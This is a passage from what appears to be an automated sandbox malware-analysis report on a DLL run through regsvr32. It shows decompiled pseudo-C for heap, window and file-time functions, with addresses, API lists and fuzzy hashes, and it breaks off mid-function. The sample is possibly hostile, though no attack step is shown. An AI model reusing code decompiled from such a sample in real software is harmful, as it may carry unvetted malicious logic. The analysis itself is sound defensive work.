                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeTask$ClearH_prolog3Variant
                                                                                                                • String ID:
                                                                                                                • API String ID: 365290523-0
                                                                                                                • Opcode ID: 046a668e55c1f63bfc0c45771c6a21394a789379807011230d761d187dd6bb23
                                                                                                                • Instruction ID: ef22d29e0bef1ac74d406dcde40b1b674f69a89cf3a88a689f20e72bee2d93af
                                                                                                                • Opcode Fuzzy Hash: 046a668e55c1f63bfc0c45771c6a21394a789379807011230d761d187dd6bb23
                                                                                                                • Instruction Fuzzy Hash: 26714675A006429FCB65DFA4C8C496AB7F2FF48305B61096CE146DB662CB31FC85CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10006745 Relevance: 6.2, APIs: 4, Instructions: 184memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 64%
                                                                                                                			E10006745(long _a4) {
				intOrPtr _v4;
				void* _t49;
				signed int _t51;
				signed int _t52;
				signed int _t53;
				signed int _t58;
				signed int _t63;
				signed int _t82;
				signed int _t85;
				intOrPtr _t101;
				signed int _t117;
				signed int _t131;
				signed int _t135;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				intOrPtr _t150;
				signed int _t156;
				signed int _t157;
				signed int _t160;
				long _t168;
				signed int _t169;
				void* _t170;
				intOrPtr _t187;

				_t170 = _a4;
				_t168 = 0;
				if(_t170 != 0) {
					if( *((intOrPtr*)(_t170 + 0x10)) != 0) {
						_t82 =  *0x100b8260; // 0x0
						_t150 =  *((intOrPtr*)(_t170 + 4));
						_t85 =  *0x100b8254; // 0x0
						 *((intOrPtr*)( *((intOrPtr*)( *_t170 + 0x28)) + ((_t82 *  *0x100b8258 + 1) *  *0x100b8250 - (_t82 + 2) *  *0x100b8264 - _t85 * _t85 -  *0x100b825c) * 2 + _t150))(_t150, 0, 0);
					}
					_t131 =  *0x100b8258; // 0x0
					_t51 =  *0x100b8250; // 0x0
					_t52 =  *0x100b8254; // 0x0
					_t53 =  *0x100b8260; // 0x0
					_t156 =  *0x100b825c; // 0x0
					 *0x100bc094(((_t51 - _t131 + _t131) * _t51 + (_t52 * _t52 - 1) * _t52 + (_t156 + _t53) * _t156 - _t53 + _t53 + _t131 << 5) +  *((intOrPtr*)(_t170 + 0x30)));
					if( *((intOrPtr*)(_t170 + 8)) == _t168) {
						L9:
						_t101 =  *((intOrPtr*)(_t170 + 4));
						if(_t101 != _t168) {
							_t58 =  *0x100b8258; // 0x0
							_t157 =  *0x100b8250; // 0x0
							_t135 =  *0x100b8264; // 0x0
							_t45 = _t135 + 1; // 0x1
							_t136 =  *0x100b825c; // 0x0
							 *((intOrPtr*)(_t170 + 0x20))(_t101, _t168, 0x8000 + ((1 - _t58 * _t58 - _t135) * _t157 * _t157 - _t45 * _t135 + (_t136 + _t58) * 2) * 3,  *((intOrPtr*)(_t170 + 0x34)));
						}
						return HeapFree(GetProcessHeap(), _t168, _t170);
					} else {
						_t138 =  *0x100b8264; // 0x0
						_t63 =  *0x100b8254; // 0x0
						_t160 =  *0x100b8258; // 0x0
						_a4 = _t168;
						_t169 =  *0x100b8250; // 0x0
						_t12 = _t63 + 1; // 0x1
						_t13 = _t138 + 4; // 0x4
						if((_t12 * _t169 + _t13 * _t160 -  *0x100b825c - _t138) * 5 +  *((intOrPtr*)(_t170 + 0xc)) <= 0) {
							L8:
							_t139 =  *0x100b8260; // 0x0
							 *0x100bc094(((_t63 - _t169 - 1) * _t138 +  *0x100b825c + (_t63 * _t169 - 1) * _t160 + _t139 * 2) * 0xc +  *((intOrPtr*)(_t170 + 8)));
							_t168 = 0;
							goto L9;
						} else {
							goto L5;
						}
						do {
							L5:
							_v4 =  *((intOrPtr*)(_t170 + 8));
							_t17 = _t63 + 1; // 0x1
							_t117 =  *0x100b825c; // 0x0
							_t187 = _v4;
							if( *((intOrPtr*)(_t187 + (_a4 + (_t160 - _t17 *  *0x100b8260 - _t117 * _t117) * 4) * 4)) != 0) {
								_t28 = _t160 + 2; // 0x2
								 *((intOrPtr*)(_t170 + 0x2c))( *((intOrPtr*)(_t187 + (((_t138 + _t138 + 1) *  *0x100b8260 + ((_t138 -  *0x100b825c - _t63) * _t160 + _t169 - 2) * _t63 - _t28 *  *0x100b825c + _t138 + _t138 + _t160) * 3 + _a4) * 4)),  *((intOrPtr*)(_t170 + 0x34)));
								_t160 =  *0x100b8258; // 0x0
								_t169 =  *0x100b8250; // 0x0
								_t63 =  *0x100b8254; // 0x0
								_t138 =  *0x100b8264; // 0x0
							}
							_a4 = _a4 + 1;
							_t36 = _t63 + 1; // 0x1
							_t37 = _t138 + 4; // 0x4
						} while (_a4 < (_t36 * _t169 + _t37 * _t160 -  *0x100b825c - _t138) * 5 +  *((intOrPtr*)(_t170 + 0xc)));
						goto L8;
					}
				}
				return _t49;
			}



























                                                                                                                0x10006747
                                                                                                                0x1000674c
                                                                                                                0x10006750
                                                                                                                0x1000675b
                                                                                                                0x1000675d
                                                                                                                0x1000677d
                                                                                                                0x10006782
                                                                                                                0x100067a1
                                                                                                                0x100067a1
                                                                                                                0x100067a3
                                                                                                                0x100067ae
                                                                                                                0x100067ba
                                                                                                                0x100067c8
                                                                                                                0x100067cf
                                                                                                                0x100067ea
                                                                                                                0x100067f4
                                                                                                                0x10006920
                                                                                                                0x10006920
                                                                                                                0x10006925
                                                                                                                0x10006927
                                                                                                                0x1000692c
                                                                                                                0x1000693c
                                                                                                                0x1000694d
                                                                                                                0x10006953
                                                                                                                0x1000696c
                                                                                                                0x1000696f
                                                                                                                0x00000000
                                                                                                                0x100067fa
                                                                                                                0x100067fa
                                                                                                                0x10006800
                                                                                                                0x10006805
                                                                                                                0x1000680b
                                                                                                                0x1000680f
                                                                                                                0x10006815
                                                                                                                0x1000681b
                                                                                                                0x10006833
                                                                                                                0x100068f0
                                                                                                                0x10006905
                                                                                                                0x10006917
                                                                                                                0x1000691e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10006839
                                                                                                                0x10006839
                                                                                                                0x1000683c
                                                                                                                0x10006840
                                                                                                                0x1000684e
                                                                                                                0x10006860
                                                                                                                0x10006869
                                                                                                                0x10006883
                                                                                                                0x100068aa
                                                                                                                0x100068ad
                                                                                                                0x100068b3
                                                                                                                0x100068b9
                                                                                                                0x100068c0
                                                                                                                0x100068c0
                                                                                                                0x100068c6
                                                                                                                0x100068ca
                                                                                                                0x100068d0
                                                                                                                0x100068e6
                                                                                                                0x00000000
                                                                                                                0x10006839
                                                                                                                0x100067f4
                                                                                                                0x10006986

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@Heap$FreeProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 834397476-0
                                                                                                                • Opcode ID: a1d15b61cb41285e90d20573a3840d593ec0e8679d45f1630e4f23d859c89062
                                                                                                                • Instruction ID: a33d3eeb4898aca3852763717d139282d52eedfb90574e918919efc758e9e97d
                                                                                                                • Opcode Fuzzy Hash: a1d15b61cb41285e90d20573a3840d593ec0e8679d45f1630e4f23d859c89062
                                                                                                                • Instruction Fuzzy Hash: 0461933A2447168FD718DFA8CEC69D5BBE9F7E83007158B3AD4458B275E770A609CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10031B00 Relevance: 6.2, APIs: 4, Instructions: 173windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 34%
                                                                                                                			E10031B00(signed int __ecx, void* __edx) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				char _v76;
				intOrPtr _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t63;
				signed int _t64;
				intOrPtr _t70;
				signed int _t72;
				signed int _t73;
				signed int _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t84;
				signed int _t86;
				signed int _t88;
				signed int _t92;
				intOrPtr* _t99;
				signed int _t100;
				signed int _t126;
				intOrPtr _t127;
				void* _t144;
				void* _t147;
				intOrPtr* _t148;
				signed int** _t150;
				signed int* _t151;
				signed int _t154;
				signed int _t156;
				void* _t158;
				void* _t161;

				_t144 = __edx;
				_t126 = __ecx;
				_t158 = _t161;
				_t154 = __ecx;
				_t63 =  *((intOrPtr*)(__ecx + 4));
				_push(_t147);
				if(_t63 != 0) {
					_t64 =  *(_t63 + 0x28);
					__eflags = _t64;
					if(_t64 == 0) {
						goto L4;
					} else {
						_t126 = _t64;
						_t72 = E10015912(0, _t126, _t147);
						__eflags = _t72;
						_v8 = _t72;
						if(_t72 == 0) {
							goto L4;
						} else {
							_t73 = IsWindowVisible( *(_t72 + 0x20));
							asm("sbb eax, eax");
							_t75 =  ~_t73 + 1;
							__eflags = _t75;
							_v24 = _t75;
							if(_t75 != 0) {
								GetWindowRect( *(E10013FEA(0, _t126, _t158, GetDesktopWindow()) + 0x20),  &_v56);
								GetWindowRect( *(_v8 + 0x20),  &_v40);
								asm("cdq");
								asm("cdq");
								__eflags = _v56.right - _v56.left - _t144;
								E100178FF(_v8, _v56.right - _v56.left - _t144 >> 1, _v56.bottom - _v56.top - _t144 >> 1, 0, 0, 0);
								E1001793D(_v8, 1);
							}
							_t77 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
							_t148 = _t154 + 0x48;
							_t78 =  *((intOrPtr*)( *_t77))(_t77, 0x1009df80, _t148);
							__eflags = _t78;
							if(_t78 < 0) {
								_t80 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
								_t81 =  *((intOrPtr*)( *_t80))(_t80, 0x1009dfd8,  &_v16);
								__eflags = _t81;
								if(_t81 >= 0) {
									_t82 = _v16;
									 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v20);
									_t84 = _v16;
									 *((intOrPtr*)( *_t84 + 8))(_t84);
									_t86 = _v20;
									__eflags = _t86;
									if(_t86 != 0) {
										_t150 = _t154 + 8;
										_v12 =  *((intOrPtr*)( *_t86))(_t86, 0x100a428c, _t150);
										_t88 = _v20;
										 *((intOrPtr*)( *_t88 + 8))(_t88);
										_t81 = _v12;
										__eflags = _t81;
										if(__eflags >= 0) {
											_t151 =  *_t150;
											 *( *_t151)(_t151, 0x100a426c, _t154 + 0xc);
											goto L21;
										}
									} else {
										_t81 = 0x80004005;
									}
								}
							} else {
								_t99 =  *_t148;
								_t151 = _t154 + 0x4c;
								_t100 =  *((intOrPtr*)( *_t99 + 0xc))(_t99, 0, 0x100a61dc, _t151);
								__eflags =  *_t151;
								_v12 = _t100;
								if( *_t151 == 0) {
									_v12 = 0x80004003;
								}
								__eflags = _v12;
								if(__eflags >= 0) {
									L21:
									_t92 = E10031021(0, _t154, _t151, _t154, __eflags);
									__eflags = _v24;
									_t156 = _t92;
									if(_v24 != 0) {
										__eflags = _v40.right - _v40.left;
										E100178FF(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
										E1001793D(_v8, 0);
									}
									_t81 = _t156;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										__eflags = _v40.right - _v40.left;
										E100178FF(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
										E1001793D(_v8, 0);
									}
									_t81 = _v12;
								}
							}
							return _t81;
						}
					}
				} else {
					L4:
					_push(_t158);
					_push(_t126);
					_v76 = 0x100b8618;
					L10048E48( &_v76, 0x100aff30);
					asm("int3");
					_push(4);
					E1004764D(0x1008dd26, 0, _t147, _t154);
					_t127 = E10020454(0x104);
					_v88 = _t127;
					_t70 = 0;
					_v76 = 0;
					if(_t127 != 0) {
						_t70 = E1001DB72(_t127);
					}
					return E10047725(_t70);
				}
			}












































                                                                                                                0x10031b00
                                                                                                                0x10031b00
                                                                                                                0x10031b01
                                                                                                                0x10031b08
                                                                                                                0x10031b0a
                                                                                                                0x10031b11
                                                                                                                0x10031b12
                                                                                                                0x10031b19
                                                                                                                0x10031b1c
                                                                                                                0x10031b1e
                                                                                                                0x00000000
                                                                                                                0x10031b20
                                                                                                                0x10031b20
                                                                                                                0x10031b22
                                                                                                                0x10031b27
                                                                                                                0x10031b29
                                                                                                                0x10031b2c
                                                                                                                0x00000000
                                                                                                                0x10031b2e
                                                                                                                0x10031b31
                                                                                                                0x10031b39
                                                                                                                0x10031b3b
                                                                                                                0x10031b3b
                                                                                                                0x10031b3c
                                                                                                                0x10031b3f
                                                                                                                0x10031b5a
                                                                                                                0x10031b66
                                                                                                                0x10031b71
                                                                                                                0x10031b80
                                                                                                                0x10031b81
                                                                                                                0x10031b86
                                                                                                                0x10031b90
                                                                                                                0x10031b90
                                                                                                                0x10031b98
                                                                                                                0x10031b9d
                                                                                                                0x10031ba7
                                                                                                                0x10031ba9
                                                                                                                0x10031bab
                                                                                                                0x10031c0c
                                                                                                                0x10031c1b
                                                                                                                0x10031c1d
                                                                                                                0x10031c1f
                                                                                                                0x10031c25
                                                                                                                0x10031c2f
                                                                                                                0x10031c32
                                                                                                                0x10031c38
                                                                                                                0x10031c3b
                                                                                                                0x10031c3e
                                                                                                                0x10031c40
                                                                                                                0x10031c4b
                                                                                                                0x10031c57
                                                                                                                0x10031c5a
                                                                                                                0x10031c60
                                                                                                                0x10031c63
                                                                                                                0x10031c66
                                                                                                                0x10031c68
                                                                                                                0x10031c6a
                                                                                                                0x10031c78
                                                                                                                0x00000000
                                                                                                                0x10031c78
                                                                                                                0x10031c42
                                                                                                                0x10031c42
                                                                                                                0x10031c42
                                                                                                                0x10031c40
                                                                                                                0x10031bad
                                                                                                                0x10031bad
                                                                                                                0x10031bb1
                                                                                                                0x10031bbc
                                                                                                                0x10031bbf
                                                                                                                0x10031bc1
                                                                                                                0x10031bc4
                                                                                                                0x10031bc6
                                                                                                                0x10031bc6
                                                                                                                0x10031bcd
                                                                                                                0x10031bd0
                                                                                                                0x10031c7a
                                                                                                                0x10031c7c
                                                                                                                0x10031c81
                                                                                                                0x10031c84
                                                                                                                0x10031c86
                                                                                                                0x10031c96
                                                                                                                0x10031ca0
                                                                                                                0x10031ca9
                                                                                                                0x10031ca9
                                                                                                                0x10031cae
                                                                                                                0x10031bd6
                                                                                                                0x10031bd6
                                                                                                                0x10031bd9
                                                                                                                0x10031be9
                                                                                                                0x10031bf3
                                                                                                                0x10031bfc
                                                                                                                0x10031bfc
                                                                                                                0x10031c01
                                                                                                                0x10031c01
                                                                                                                0x10031bd0
                                                                                                                0x10031cb4
                                                                                                                0x10031cb4
                                                                                                                0x10031b2c
                                                                                                                0x10031b14
                                                                                                                0x10031b14
                                                                                                                0x1000a069
                                                                                                                0x1000a06c
                                                                                                                0x1000a076
                                                                                                                0x1000a07d
                                                                                                                0x1000a082
                                                                                                                0x1000a083
                                                                                                                0x1000a08a
                                                                                                                0x1000a099
                                                                                                                0x1000a09b
                                                                                                                0x1000a09e
                                                                                                                0x1000a0a2
                                                                                                                0x1000a0a5
                                                                                                                0x1000a0a7
                                                                                                                0x1000a0a7
                                                                                                                0x1000a0b1
                                                                                                                0x1000a0b1

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$DesktopVisible
                                                                                                                • String ID:
                                                                                                                • API String ID: 1055025324-0
                                                                                                                • Opcode ID: 796ccccd26661263c6126ba4b3792ed7bc094707f154db6d2883937cb8b05c28
                                                                                                                • Instruction ID: b37612f4069db3000d5051cf8fcec6d766bd154b7c31607ea0a7e8fdfd1e8d3f
                                                                                                                • Opcode Fuzzy Hash: 796ccccd26661263c6126ba4b3792ed7bc094707f154db6d2883937cb8b05c28
                                                                                                                • Instruction Fuzzy Hash: F051C675A0010AEFCB05DFA8C994CEEB7B9FF48245B1145A9F606EB261DB31ED41CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003926B Relevance: 6.1, APIs: 4, Instructions: 132timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1003926B(void* __ecx, void* __eflags, signed int* _a4) {
				char _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t52;
				long _t56;
				signed int* _t75;
				signed int* _t78;
				signed int* _t81;
				struct _FILETIME* _t88;
				void* _t100;
				CHAR* _t101;
				signed int* _t102;
				void* _t103;
				void* _t107;

				_t85 = __ecx;
				_t102 = _a4;
				_t100 = __ecx;
				E10049170(__ecx, _t102, 0, 0x128);
				E1000A0B7(0, _t85, _t100, _t102, _t103,  &(_t102[8]), 0x104,  *(_t100 + 0xc), 0xffffffff);
				_t52 =  *(_t100 + 4);
				_t107 = _t52 -  *0x1009db74; // 0xffffffff
				if(_t107 == 0) {
					L21:
					return 1;
				}
				_t88 =  &_v12;
				if(GetFileTime(_t52, _t88,  &_v20,  &_v28) != 0) {
					_t56 = GetFileSize( *(_t100 + 4), 0);
					_t102[6] = _t56;
					_t102[7] = 0;
					if(_t56 != 0xffffffff || 0 != 0) {
						_t101 =  *(_t100 + 0xc);
						if( *((intOrPtr*)(_t101 - 0xc)) != 0) {
							_t102[8] = (_t88 & 0xffffff00 | GetFileAttributesA(_t101) == 0xffffffff) - 0x00000001 & _t57;
						} else {
							_t102[8] = 0;
						}
						if(E10038C62( &_v12) == 0) {
							 *_t102 = 0;
							_t102[1] = 0;
						} else {
							_t81 = L10038D98(0,  &_v36, _t101,  &_v12, 0xffffffff);
							 *_t102 =  *_t81;
							_t102[1] = _t81[1];
						}
						if(E10038C62( &_v20) == 0) {
							_t102[4] = 0;
							_t102[5] = 0;
						} else {
							_t78 = L10038D98(0,  &_v36, _t101,  &_v20, 0xffffffff);
							_t102[4] =  *_t78;
							_t102[5] = _t78[1];
						}
						if(E10038C62( &_v28) == 0) {
							_t102[2] = 0;
							_t102[3] = 0;
						} else {
							_t75 = L10038D98(0,  &_v36, _t101,  &_v28, 0xffffffff);
							_t102[2] =  *_t75;
							_t102[3] = _t75[1];
						}
						if(( *_t102 | _t102[1]) == 0) {
							 *_t102 = _t102[2];
							_t102[1] = _t102[3];
						}
						if((_t102[4] | _t102[5]) == 0) {
							_t102[4] = _t102[2];
							_t102[5] = _t102[3];
						}
						goto L21;
					} else {
						goto L2;
					}
				}
				L2:
				return 0;
			}






















                                                                                                                0x1003926b
                                                                                                                0x10039273
                                                                                                                0x10039280
                                                                                                                0x10039282
                                                                                                                0x10039295
                                                                                                                0x1003929a
                                                                                                                0x100392a0
                                                                                                                0x100392a6
                                                                                                                0x100393ba
                                                                                                                0x00000000
                                                                                                                0x100393bc
                                                                                                                0x100392b4
                                                                                                                0x100392c1
                                                                                                                0x100392ce
                                                                                                                0x100392d7
                                                                                                                0x100392da
                                                                                                                0x100392dd
                                                                                                                0x100392e3
                                                                                                                0x100392e9
                                                                                                                0x10039301
                                                                                                                0x100392eb
                                                                                                                0x100392eb
                                                                                                                0x100392eb
                                                                                                                0x1003930f
                                                                                                                0x1003932b
                                                                                                                0x1003932d
                                                                                                                0x10039311
                                                                                                                0x1003931a
                                                                                                                0x10039321
                                                                                                                0x10039326
                                                                                                                0x10039326
                                                                                                                0x1003933b
                                                                                                                0x1003935c
                                                                                                                0x1003935f
                                                                                                                0x1003933d
                                                                                                                0x10039346
                                                                                                                0x1003934d
                                                                                                                0x10039353
                                                                                                                0x10039353
                                                                                                                0x1003936d
                                                                                                                0x1003938e
                                                                                                                0x10039391
                                                                                                                0x1003936f
                                                                                                                0x10039378
                                                                                                                0x1003937f
                                                                                                                0x10039385
                                                                                                                0x10039385
                                                                                                                0x10039399
                                                                                                                0x1003939e
                                                                                                                0x100393a3
                                                                                                                0x100393a3
                                                                                                                0x100393ac
                                                                                                                0x100393b1
                                                                                                                0x100393b7
                                                                                                                0x100393b7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100392dd
                                                                                                                0x100392c3
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 10039282
                                                                                                                  • Part of subcall function 1000A0B7: _wctomb_s.LIBCMT ref: 1000A0C7
                                                                                                                • GetFileTime.KERNEL32(?,?,?,?), ref: 100392B9
                                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 100392CE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$SizeTime_memset_wctomb_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 26245289-0
                                                                                                                • Opcode ID: 9e23e771f43b21b5225b5bbeaec31b18534d685dfb75f694ddad4e772cd0be0e
                                                                                                                • Instruction ID: 395707f0aedb694bf18453a667929c4cad6f780381ae80af0bd1f268e73cf5ff
                                                                                                                • Opcode Fuzzy Hash: 9e23e771f43b21b5225b5bbeaec31b18534d685dfb75f694ddad4e772cd0be0e
                                                                                                                • Instruction Fuzzy Hash: 4C411AB5500705AFC725DF68C981C9AB7F8FF09351B108A6EE5A6D7690E730FA44CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10037302 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 73%
                                                                                                                			E10037302(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t36;
				intOrPtr _t40;
				struct HWND__* _t44;
				signed int _t47;
				short* _t52;
				intOrPtr _t65;
				struct HWND__* _t70;
				intOrPtr _t79;
				short* _t82;
				intOrPtr _t83;
				struct HWND__** _t85;
				intOrPtr _t86;
				signed int _t87;
				void* _t89;
				struct HWND__** _t94;
				intOrPtr _t96;

				_t80 = __edi;
				_t79 = __edx;
				_t87 = _t89 - 0xfc;
				_t36 =  *0x100b9e70; // 0xbb35530
				 *(_t87 + 0x100) = _t36 ^ _t87;
				_push(0xc);
				E1004764D(0x10090b14, __ebx, __edi, __esi);
				_t85 =  *(_t87 + 0x110);
				_t40 =  *((intOrPtr*)(_t87 + 0x114));
				_t94 = _t85;
				_t67 = 0 | _t94 != 0x00000000;
				 *((intOrPtr*)(_t87 - 0x18)) = _t40;
				_t95 = _t94 != 0;
				if(_t94 != 0) {
					L2:
					_t96 = _t40;
					_t67 = 0 | _t96 != 0x00000000;
					if(_t96 != 0) {
						goto L1;
					}
					L1000140B(_t87 - 0x10, E100184C0());
					_t44 = _t85[2];
					_t70 = _t85[1];
					 *((intOrPtr*)(_t87 - 4)) = 0;
					if(_t44 != 0xfffffdf8 || (_t85[0x19] & 0x00000001) == 0) {
						if(_t44 != 0xfffffdee || (_t85[0x2d] & 0x00000001) == 0) {
							goto L8;
						} else {
							goto L7;
						}
					} else {
						L7:
						_t70 = GetDlgCtrlID(_t70) & 0x0000ffff;
						L8:
						if(_t70 == 0) {
							L12:
							__eflags = _t85[2] - 0xfffffdf8;
							if(_t85[2] != 0xfffffdf8) {
								 *(_t87 - 0x14) =  *(_t87 - 0x10);
								_t82 =  &(_t85[4]);
								_t47 = MultiByteToWideChar( *0x100bb480(), 0,  *(_t87 - 0x14), 0xffffffff, _t82, 0x50);
								__eflags = _t82;
								if(_t82 != 0) {
									__eflags = _t47 - 0x50;
									if(_t47 > 0x50) {
										_push(0x80004005);
										_t47 = L10001401(0, _t70, _t79, _t82, _t85, _t87);
									}
								}
								__eflags = _t47;
								if(_t47 > 0) {
									__eflags = _t82;
									if(_t82 != 0) {
										 *((short*)(_t82 + _t47 * 2 - 2)) = 0;
									}
								}
							} else {
								L10034FCA(0, _t79, 0xfffffdf8, _t85, _t87,  &(_t85[4]), 0x50,  *(_t87 - 0x10), 0xffffffff);
							}
							 *((intOrPtr*)( *((intOrPtr*)(_t87 - 0x18)))) = 0;
							SetWindowPos( *_t85, 0, 0, 0, 0, 0, 0x213);
							L100013E3( &(( *(_t87 - 0x10))[0xfffffffffffffff0]), _t79);
							_t52 = 1;
							__eflags = 1;
							L21:
							 *[fs:0x0] =  *((intOrPtr*)(_t87 - 0xc));
							_pop(_t83);
							_pop(_t86);
							_pop(_t65);
